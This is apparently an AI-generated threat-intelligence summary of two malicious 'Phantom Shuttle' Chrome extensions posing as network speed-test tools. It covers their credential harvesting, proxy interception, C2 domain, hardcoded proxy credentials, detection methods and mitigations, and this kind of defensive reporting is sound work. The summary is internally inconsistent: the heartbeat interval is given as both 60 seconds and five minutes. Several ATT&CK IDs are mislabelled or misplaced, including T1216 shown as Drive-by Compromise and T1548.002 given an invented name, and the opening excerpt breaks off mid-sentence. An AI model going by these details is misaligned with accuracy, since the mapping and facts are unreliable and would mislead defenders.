Full Report
Cybersecurity researchers have discovered two malicious Google Chrome extensions with the same name and published by the same developer that come with capabilities to intercept traffic and capture user credentials. The extensions are advertised as a "multi-location network speed test plug-in" for developers and foreign trade personnel. Both the browser add-ons are available for download as of
Analysis Summary
# Tool/Technique: Malicious Chrome Extensions (Phantom Shuttle Variants)
## Overview
Two malicious Google Chrome extensions, both named "Phantom Shuttle" and published by the same developer, were discovered to secretly intercept user traffic, capture credentials, and operate as man-in-the-middle (MitM) proxies. They are disguised as legitimate "multi-location network speed test plug-ins" targeting developers and foreign trade personnel, often sold via subscription facade.
## Technical Details
- Type: Malware (Browser Extension)
- Platform: Google Chrome (Web Browser)
- Capabilities: Traffic interception, credential harvesting (usernames, passwords, credit cards, keys), MitM proxy implementation, C2 communication, and persistent data exfiltration.
- First Seen: One variant published November 26, 2017; the second April 27, 2023.
## MITRE ATT&CK Mapping
- **TA0010 - Exfiltration**
- T1041 - Exfiltration Over C2 Channel
- *Functionality relies on the 60-second heartbeat to send credentials.*
- **TA0005 - Defense Evasion**
- T1216 - Drive-by Compromise (Via extension installation)
- **TA0004 - Privilege Escalation**
- T1548.002 - Abuse Extension Installation
- **TA0002 - Execution**
- T1204.002 - User Execution: Malicious File (User installs the extension)
- **TA0011 - Command and Control**
- T1071.001 - Application Layer Protocol: Web Protocols (HTTP GET requests for exfiltration)
## Functionality
### Core Capabilities
- **Traffic Interception and Proxying:** Routes web traffic, particularly from over 170 targeted high-value domains (e.g., GitHub, AWS, Docker, Facebook), through actor-controlled proxy servers ("smarty" proxy mode).
- **Credential Injection:** Utilizes **`chrome.webRequest.onAuthRequired`** listener in asyncBlocking mode to automatically inject hardcoded proxy credentials (`topfany / 963852wei`) whenever an HTTP authentication challenge occurs, bypassing user prompts.
- **Credential Harvesting:** Captures sensitive data including emails, passwords (in plaintext), credit card numbers, authentication cookies, browsing history, API keys, and access tokens from targeted sites.
### Advanced Features
- **Evasion via Deception:** Functions as advertised (latency tests, status display) to maintain the illusion of a legitimate VPN/speed test service, hiding malicious primary goals.
- **Persistent Exfiltration:** Sends a "heartbeat" HTTP GET request every five minutes, transmitting the VIP user's email, password (plaintext), and version number to the C2 server.
- **Proxy Configuration Management:** Uses a Proxy Auto-Configuration (PAC) script to allow configuration switching between `close` (disable proxy), `always` (all traffic proxied), and `smarty` (targeted domain traffic proxied).
- **Man-in-the-Middle (MitM):** Gains the ability to capture traffic, manipulate responses, and inject arbitrary payloads once the proxy authenticates the user session.
## Indicators of Compromise
- File Hashes: N/A (Specific hashes not provided in the text)
- File Names: The extensions are named "Phantom Shuttle."
- Registry Keys: N/A (Browser extension configuration)
- Network Indicators: `phantomshuttle[.]space` (C2 server domain)
- Behavioral Indicators:
- Modification of bundled libraries (`jquery-1.12.2.min.js`, `scripts.js`) with malicious code.
- Registration of listener on **`chrome.webRequest.onAuthRequired`**.
- Outbound HTTP GET requests at five-minute intervals transmitting plaintext credentials.
- Configuration of Chrome proxy settings based on PAC file rules (`close`, `always`, `smarty`).
## Associated Threat Actors
- The threat actor is currently unnamed, identified only as "the threat actor" publishing the extensions via the same developer profile.
## Detection Methods
- Signature-based detection: Detection for the hardcoded credentials (`topfany` / `963852wei`) being injected into HTTP challenges.
- Behavioral detection: Monitoring for extensions dynamically manipulating `chrome.webRequest` listeners, especially utilizing the `asyncBlocking` mode for injection, and unauthorized PAC file configuration changes.
- YARA rules: N/A (No specific signature rules provided).
## Mitigation Strategies
- Prevention measures: Strict review and whitelisting of browser extensions; disabling side-loading of extensions.
- Hardening recommendations: Regularly audit installed extensions; avoid installing extensions that require excessive permissions, especially those related to network interception or scripting across all sites. Users should be highly suspicious of "utility" extensions that require payment/subscription but offer broad network access.
## Related Tools/Techniques
- Other malicious Chrome extensions involved in traffic interception and credential theft.
- Use of legitimate service facades (VPN/Speed Test) to gain trust for credential harvesting.